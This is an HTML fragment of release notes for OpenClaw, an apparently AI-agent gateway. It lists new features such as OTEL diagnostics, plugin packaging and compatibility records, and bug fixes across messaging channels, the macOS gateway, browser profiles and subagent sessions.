<li>Plugins/source metadata: warn when provider or channel catalog package identity drifts from <code>openclaw.install.npmSpec</code>, keeping diagnostics visible without rejecting compatible external catalogs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/Bonjour: move LAN Gateway discovery advertising into a default-enabled bundled plugin with its own <code>@homebridge/ciao</code> dependency, so users can disable Bonjour without cutting wide-area discovery. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/compatibility: add a central plugin compatibility registry and docs for SDK/config/setup/runtime deprecation records, including dated migration metadata for legacy harness naming and other plugin-facing aliases. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>TUI/dependencies: remove direct <code>cli-highlight</code> usage from the OpenClaw TUI code-block renderer, keeping themed code coloring without the extra root dependency. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Dependencies/SBOM: add an ownership-backed dependency risk report for root closure size, native/build-risk packages, and missing owner records. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: export run, model-call, and tool-execution diagnostic lifecycle events as OTEL spans without retaining live span state. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: accept opt-in <code>diagnostics.otel.captureContent</code> controls for future model/tool content span attributes while keeping raw content export disabled by default. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: add a lightweight diagnostic trace-context carrier for future span correlation without adding OTEL SDK state to core. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: attach diagnostic trace context to exported OTEL logs so log records can correlate with future spans without adding retained process state. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: pass immutable per-run diagnostic trace context through agent and tool hook contexts, and parent exported diagnostic spans from validated context without retaining global trace state. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: make exporter startup restart-safe so config reloads do not retain stale SDKs, log transports, or diagnostic event listeners. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: emit bounded exec-process diagnostics and export them as <code>openclaw.exec</code> spans without exposing command text, working directories, or container identifiers. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312775760" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70424" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70424/hovercard" href="https://github.com/openclaw/openclaw/pull/70424">#70424</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jlapenna/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jlapenna">@jlapenna</a>.</li>
<li>Diagnostics/OTEL: support <code>OPENCLAW_OTEL_PRELOADED=1</code> so the plugin can reuse an already-registered OpenTelemetry SDK while keeping OpenClaw diagnostic listeners wired. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312775760" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70424" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70424/hovercard" href="https://github.com/openclaw/openclaw/pull/70424">#70424</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jlapenna/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jlapenna">@jlapenna</a>.</li>
<li>Diagnostics: emit structured tool execution diagnostic events with trace context, timing, and redacted error metadata. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics: emit structured run and model-call diagnostic events with trace context, duration, and non-message error metadata. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/Gateway: make <code>gateway status</code> start faster by skipping plugin loading on the read-only status path. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326783128" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71364" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71364/hovercard" href="https://github.com/openclaw/openclaw/pull/71364">#71364</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andyylin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andyylin">@andyylin</a>.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>MCP: retire one-shot embedded bundled MCP runtimes at run end, skip bundle-MCP startup when a runtime tool allowlist cannot reach bundle-MCP tools, and add <code>mcp.sessionIdleTtlMs</code> idle eviction for leaked session runtimes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4323105025" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71106" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71106/hovercard" href="https://github.com/openclaw/openclaw/issues/71106">#71106</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4323140457" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71110" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71110/hovercard" href="https://github.com/openclaw/openclaw/issues/71110">#71110</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312378990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70389" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70389/hovercard" href="https://github.com/openclaw/openclaw/issues/70389">#70389</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319231374" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70808" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70808/hovercard" href="https://github.com/openclaw/openclaw/issues/70808">#70808</a>.</li>
<li>Gateway/restart continuation: durably hand restart continuations to a session-delivery queue before deleting the restart sentinel, recover queued continuation work after crashy restarts, and fall back to a session-only wake when no channel route survives reboot. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318942406" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70780" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70780/hovercard" href="https://github.com/openclaw/openclaw/pull/70780">#70780</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fuller-stack-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fuller-stack-dev">@fuller-stack-dev</a>.</li>
<li>Agents/tool-result pruning: harden the tool-result character estimator and context-pruning loops against malformed <code>{ type: "text" }</code> blocks created by void or undefined tool handler results, serializing non-string text payloads for size accounting so they cannot bypass trimming as zero-sized. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4024106459" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/34979" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/34979/hovercard" href="https://github.com/openclaw/openclaw/issues/34979">#34979</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4110037760" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51267" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/51267/hovercard" href="https://github.com/openclaw/openclaw/pull/51267">#51267</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cgdusek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cgdusek">@cgdusek</a>.</li>
<li>Daemon/service-env: add Nix Home Manager profile bin directories to generated gateway service PATHs on macOS and Linux, honoring <code>NIX_PROFILES</code> right-to-left precedence and falling back to <code>~/.nix-profile/bin</code> when unset. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4067523684" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44402" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44402/hovercard" href="https://github.com/openclaw/openclaw/issues/44402">#44402</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4197325860" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59935" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/59935/hovercard" href="https://github.com/openclaw/openclaw/pull/59935">#59935</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jerome-benoit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jerome-benoit">@jerome-benoit</a>.</li>
<li>Feishu: back off streaming-card creation after HTTP 400 startup failures, so unsupported card setups fall back without delaying every message. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4163940712" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56981" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56981/hovercard" href="https://github.com/openclaw/openclaw/issues/56981">#56981</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JinnanDuan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JinnanDuan">@JinnanDuan</a>.</li>
<li>Feishu/topic groups: key native Feishu/Lark topic-group sessions by <code>thread_id</code> so starter messages and replies with different <code>root_id</code> formats stay in the same <code>group_topic</code> conversation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327357291" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71438" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71438/hovercard" href="https://github.com/openclaw/openclaw/issues/71438">#71438</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/1335848090/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/1335848090">@1335848090</a>.</li>
<li>Feishu: suppress duplicate final card delivery when idle closes a streaming card before the final payload arrives. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4287453781" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68491" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68491/hovercard" href="https://github.com/openclaw/openclaw/pull/68491">#68491</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MoerAI/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MoerAI">@MoerAI</a>.</li>
<li>Signal: preserve sender attachment filenames and resolve missing MIME types from those filenames, so Linux <code>signal-cli</code> voice notes without <code>contentType</code> still enter audio transcription. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4085646677" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48614" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48614/hovercard" href="https://github.com/openclaw/openclaw/issues/48614">#48614</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mindfury/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mindfury">@mindfury</a>.</li>
<li>Telegram/agents: suppress the phantom "Agent couldn't generate a response" fallback after a reply was already committed through the messaging tool. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4316452785" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70623" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70623/hovercard" href="https://github.com/openclaw/openclaw/issues/70623">#70623</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chinar-amrutkar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chinar-amrutkar">@chinar-amrutkar</a>.</li>
<li>Models/CLI: show provider runtime <code>contextTokens</code> beside native <code>contextWindow</code> in <code>openclaw models list</code>, and align <code>openai-codex/gpt-5.5</code> with Codex's 272K runtime cap plus 400K native window. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327081656" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71403" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71403/hovercard" href="https://github.com/openclaw/openclaw/issues/71403">#71403</a>.</li>
<li>Dashboard/security: avoid writing tokenized Control UI URLs or SSH hints to runtime logs, keeping gateway bearer fragments out of console-captured logs readable through <code>logs.tail</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4307191658" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70029" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70029/hovercard" href="https://github.com/openclaw/openclaw/pull/70029">#70029</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Ziy1-Tan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Ziy1-Tan">@Ziy1-Tan</a>.</li>
<li>Providers/OpenRouter: treat DeepSeek refs as cache-TTL eligible without injecting Anthropic cache-control markers, aligning context pruning with OpenRouter-managed prompt caching. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4114368915" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51983" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/51983/hovercard" href="https://github.com/openclaw/openclaw/pull/51983">#51983</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/QuinnH496/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/QuinnH496">@QuinnH496</a>.</li>
<li>Control UI/browser: defer temp-dir access-mode constants until Node-only temp-dir resolution runs, preventing browser bundles from crashing when <code>node:fs</code> constants are stubbed. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4087616978" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48930" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/48930/hovercard" href="https://github.com/openclaw/openclaw/pull/48930">#48930</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Valentinws/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Valentinws">@Valentinws</a>.</li>
<li>Discord/cron: deliver text-only isolated cron and heartbeat announce output from the canonical final assistant text once, avoiding duplicate Discord posts when streamed block payloads and the final answer contain the same content. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327126833" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71406" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71406/hovercard" href="https://github.com/openclaw/openclaw/issues/71406">#71406</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexgross21/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexgross21">@alexgross21</a>.</li>
<li>macOS Gateway: wait for launchd to reload the exited Gateway LaunchAgent before bootstrapping repair fallback, preventing config-triggered restarts from leaving the service not loaded. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4071433545" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45178" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45178/hovercard" href="https://github.com/openclaw/openclaw/issues/45178">#45178</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>macOS Gateway: tolerate launchctl bootstrap's already-loaded exit during restart fallback and use non-killing kickstart after bootstrap, avoiding a second race that can unload the LaunchAgent. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4050163032" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41934" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41934/hovercard" href="https://github.com/openclaw/openclaw/issues/41934">#41934</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zerone0x/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zerone0x">@zerone0x</a>.</li>
<li>macOS Gateway: rewrite stale LaunchAgent plists before restart fallback bootstrap, matching install repair behavior when <code>gateway restart</code> has to re-register launchd. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/maybegeeker/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/maybegeeker">@maybegeeker</a>.</li>
<li>TTS/hooks: preserve audio-only TTS transcripts for <code>message_sending</code> and <code>message_sent</code> hooks without rendering the transcript as a media caption. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zqchris/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zqchris">@zqchris</a>.</li>
<li>WhatsApp/TTS: preserve <code>audioAsVoice</code> through shared media payload sends and the WhatsApp outbound adapter, so <code>[[audio_as_voice]]</code> reply payloads keep their voice-note intent when routed through <code>sendPayload</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4256386227" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66053" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66053/hovercard" href="https://github.com/openclaw/openclaw/issues/66053">#66053</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/masatohoshino/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/masatohoshino">@masatohoshino</a>.</li>
<li>Control UI/WebChat: hide heartbeat prompts, <code>HEARTBEAT_OK</code> acknowledgments, and internal-only runtime context turns from visible chat history while leaving the underlying transcript intact. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326892345" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71381" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71381/hovercard" href="https://github.com/openclaw/openclaw/issues/71381">#71381</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gerald1950ggg-ai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gerald1950ggg-ai">@gerald1950ggg-ai</a>.</li>
<li>Control UI/chat: keep optimistic user and assistant tail messages visible when a final history refresh briefly returns an older snapshot, preventing message cards from flash-disappearing until the next refresh. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326837043" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71371" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71371/hovercard" href="https://github.com/openclaw/openclaw/issues/71371">#71371</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WolvenRA/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WolvenRA">@WolvenRA</a>.</li>
<li>Talk/TTS: resolve configured extension speech providers from the active runtime registry before provider-list discovery, so Talk mode no longer rejects valid plugin speech providers as unsupported.</li>
<li>Sessions/subagents: stop stale ended runs and old store-only child reverse links from reappearing in <code>childSessions</code>, while keeping live descendants and recently-ended children visible. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4173804364" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57920" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/57920/hovercard" href="https://github.com/openclaw/openclaw/issues/57920">#57920</a>.</li>
<li>Subagents: recover child sessions after recoverable wait transport failures without exposing an extra wait state, and keep terminal lifecycle timer ordering deterministic. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327279885" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71423" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71423/hovercard" href="https://github.com/openclaw/openclaw/pull/71423">#71423</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ZiPengWei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ZiPengWei">@ZiPengWei</a>.</li>
<li>Subagents: stop stale unended runs from counting as active or pending forever, while preserving restart-aborted recovery for recoverable child sessions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325447122" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71252" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71252/hovercard" href="https://github.com/openclaw/openclaw/issues/71252">#71252</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Gateway/tools: allow <code>POST /tools/invoke</code> to reach plugin-backed catalog tools such as <code>browser</code> when no core implementation exists, while still preferring built-in tools for real core names. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chat2way/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chat2way">@chat2way</a>.</li>
<li>Browser/security: require <code>operator.admin</code> for the <code>browser.request</code> gateway method, matching the host/browser-node control authority exposed by that route. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RichardCao/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RichardCao">@RichardCao</a>.</li>
<li>Browser/profiles: allow local managed profiles to override <code>browser.executablePath</code>, so different profiles can launch different Chromium-based browsers. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nobrainer-tech/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nobrainer-tech">@nobrainer-tech</a>.</li>
<li>Agents/replay: repair displaced or missing tool results before strict provider replay, use Codex-compatible <code>aborted</code> outputs for OpenAI Responses history, and drop partial aborted/error transport turns before retries.</li>
<li>Browser/startup: deduplicate concurrent lazy-start calls per profile so simultaneous browser tool requests no longer race into duplicate Chrome launches and <code>PortInUseError</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4210634083" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61772" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61772/hovercard" href="https://github.com/openclaw/openclaw/pull/61772">#61772</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sukhdeepjohar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sukhdeepjohar">@sukhdeepjohar</a>.</li>
<li>Browser/profiles: recover from stale Chromium <code>Singleton*</code> profile locks after crashes or host moves by clearing dead/foreign locks and retrying launch once. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/seanc-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/seanc-dev">@seanc-dev</a>.</li>
<li>Browser/existing-session: keep Chrome MCP status probes transport-only and ephemeral, and retry stale cached Playwright attaches once so idle profile checks no longer poison the next real attach. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4165543295" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57245" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/57245/hovercard" href="https://github.com/openclaw/openclaw/pull/57245">#57245</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/josephbergvinson/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/josephbergvinson">@josephbergvinson</a>.</li>
<li>Cron/exec: suppress automatic background exec completion wakes only for silent cron jobs with <code>delivery.mode="none"</code> while keeping webhook and announce runs observable. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326980039" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71391" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71391/hovercard" href="https://github.com/openclaw/openclaw/pull/71391">#71391</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/goldmar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/goldmar">@goldmar</a>.</li>
<li>Reply media: allow sandboxed replies to deliver OpenClaw-managed <code>media/outbound</code> and <code>media/tool-*</code> attachments without treating them as sandbox escapes, while keeping alias-escape checks on the managed media root. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4323674271" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71138" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71138/hovercard" href="https://github.com/openclaw/openclaw/issues/71138">#71138</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mayor686/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mayor686">@mayor686</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/truffle-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/truffle-dev">@truffle-dev</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</li>
<li>CLI/agent: keep <code>openclaw agent --json</code> stdout reserved for the JSON response by routing gateway, plugin, and embedded-fallback diagnostics to stderr before execution starts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326491392" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71319" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71319/hovercard" href="https://github.com/openclaw/openclaw/issues/71319">#71319</a>.</li>
<li>Agents/Gemini: retry reasoning-only, empty, and planning-only Gemini turns instead of letting sessions silently stall. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4322601367" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71074" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71074/hovercard" href="https://github.com/openclaw/openclaw/issues/71074">#71074</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326771389" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71362" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71362/hovercard" href="https://github.com/openclaw/openclaw/pull/71362">#71362</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</li>
